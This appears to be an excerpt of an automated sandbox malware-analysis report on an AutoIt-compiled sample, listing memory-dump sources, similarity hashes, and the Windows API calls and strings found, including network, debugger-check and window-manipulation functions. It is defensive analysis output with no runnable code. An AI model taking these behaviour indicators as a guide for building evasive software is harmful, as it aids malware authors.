• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: d270022b2dfd7f133e785c2d92f8283f24b7975811d0a6f5185873273c97e5d4
• Instruction ID: e6f84f0bccca294b3b06b0c25b10d3e73191d0f6fef9468a23013cc8f0aa583f
• Opcode Fuzzy Hash: d270022b2dfd7f133e785c2d92f8283f24b7975811d0a6f5185873273c97e5d4
• Instruction Fuzzy Hash: 4D411B74A053099FDB14CFA8C881BEABBB9FF09304F10016AE904EB391D770A951CF90
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00966B17
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00966B53
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 58550accba7209a9cb688855800b589b7a1e502ef327784aa8faa8731cb80023
• Instruction ID: 16e691f840144c817cc61c91c66427e10271a9908750f38738a558e0954858f9
• Opcode Fuzzy Hash: 58550accba7209a9cb688855800b589b7a1e502ef327784aa8faa8731cb80023
• Instruction Fuzzy Hash: 89318D71210604AEDB109F79DC80BFB77ADFF88760F109619F9A5D7190DA70AC81DB60
APIs
• _memset.LIBCMT ref: 00942911
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0094294C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 229015e5c629c3086509178d074ab31d177106070620119f7fb6519d7f8c9f31
• Instruction ID: 53d2e40a57ca799e3162a91def56c0e98cda95e8d4da814422b62add3928198f
• Opcode Fuzzy Hash: 229015e5c629c3086509178d074ab31d177106070620119f7fb6519d7f8c9f31
• Instruction Fuzzy Hash: 5431D231600309DFEB24CF58CA85FAEBBF8FF45350F540129F985A62A0E7709940CB51
APIs
• __snwprintf.LIBCMT ref: 00953A66
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3506404897-2584243854
• Opcode ID: d1d308f4fdddb5d7224b71ec2646ff2e16559f694f428a4b97af7958fc16a0f9
• Instruction ID: 44a09d6aff63fa797b3926c6b4182633d75212a917a95ca6d9624174b1fc6f91
• Opcode Fuzzy Hash: d1d308f4fdddb5d7224b71ec2646ff2e16559f694f428a4b97af7958fc16a0f9
• Instruction Fuzzy Hash: B6217131604219AFCF10EFA9CC82AAE77B9FF86741F504458F945E7181DB30EA45CB66
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00966761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0096676C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 316a265d1cc18e4aaaa6721ab1927ecf03f229c44f70f89912cdbedb356e9d6e
• Instruction ID: 44c9bf6c4b9574ebea8a928e0aabfded8db8a42d9cdeda8588c2c72733d0a3a2
• Opcode Fuzzy Hash: 316a265d1cc18e4aaaa6721ab1927ecf03f229c44f70f89912cdbedb356e9d6e
• Instruction Fuzzy Hash: B511BF71300208AFEF218F58DC80EAB3B6EEB883A8F110129F918D7290D6759C5197A0
APIs
  • Part of subcall function 008E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008E1D73
  • Part of subcall function 008E1D35: GetStockObject.GDI32(00000011), ref: 008E1D87
  • Part of subcall function 008E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E1D91
• GetWindowRect.USER32(00000000,?), ref: 00966C71
• GetSysColor.USER32(00000012), ref: 00966C8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: b27d2f67305c0a9af5a52a33d3cec96ef0c29727c400b1dd3cd3e524b415bfd7
• Instruction ID: 54f25ac410ab9d18ab4c47b8ff14af6acf7130f4e1076755ed8b0ec08bd68833
• Opcode Fuzzy Hash: b27d2f67305c0a9af5a52a33d3cec96ef0c29727c400b1dd3cd3e524b415bfd7
• Instruction Fuzzy Hash: 2B212972624209AFDF04DFA8DC45AFA7BA8FB08314F014629FA95D2250D675E850EB60
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 009669A2
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009669B1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• _memset.LIBCMT ref: 00942A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00942A41
Strings
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0095222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00952255
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 00957FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00957DB3,?,00000000,?,?), ref: 0095800D
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00957DB6
• htons.WSOCK32(00000000,?,00000000), ref: 00957DF3
Strings
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 2496851823-2422070025
APIs
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00938E73
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00938D6B
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
  • Part of subcall function 0093AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0093AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00938DEE
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
APIs
Strings
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
APIs
  • Part of subcall function 0091B314: _memset.LIBCMT ref: 0091B321
  • Part of subcall function 00900940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0091B2F0,?,?,?,008E100A), ref: 00900945
• IsDebuggerPresent.KERNEL32(?,?,?,008E100A), ref: 0091B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008E100A), ref: 0091B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0091B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00937C82
                                                                                                                  • Part of subcall function 00903358: _doexit.LIBCMT ref: 00903362
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message_doexit
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00921775
                                                                                                                  • Part of subcall function 0095BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0092195E,?), ref: 0095BFFE
                                                                                                                  • Part of subcall function 0095BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0095C010
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0092196D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                • String ID: WIN_XPe
                                                                                                                • API String ID: 582185067-3257408948
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009659AE
                                                                                                                • PostMessageW.USER32(00000000), ref: 009659B5
                                                                                                                  • Part of subcall function 00945244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009452BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0096596E
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00965981
                                                                                                                  • Part of subcall function 00945244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009452BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461